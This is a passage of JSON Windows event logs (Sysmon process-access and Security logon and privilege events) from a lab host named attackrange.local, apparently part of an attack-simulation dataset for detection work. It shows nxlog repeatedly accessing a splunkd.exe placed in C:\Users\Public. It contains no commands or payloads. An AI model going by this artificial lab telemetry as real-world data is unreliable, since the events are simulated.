(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:24.458","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4245,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:25.459\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:25.459","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4246,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:26.460\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:26.460","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4247,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:27.461\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:27.461","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4248,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:28.462\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:28.462","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220397,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x607CF\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x607cf","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:52:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220398,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x607CF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52598\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x607cf","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52598","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:52:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220399,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x607CF\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x607cf","LogonType":"3","EventReceivedTime":"2020-08-01 06:52:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4249,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:29.463\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 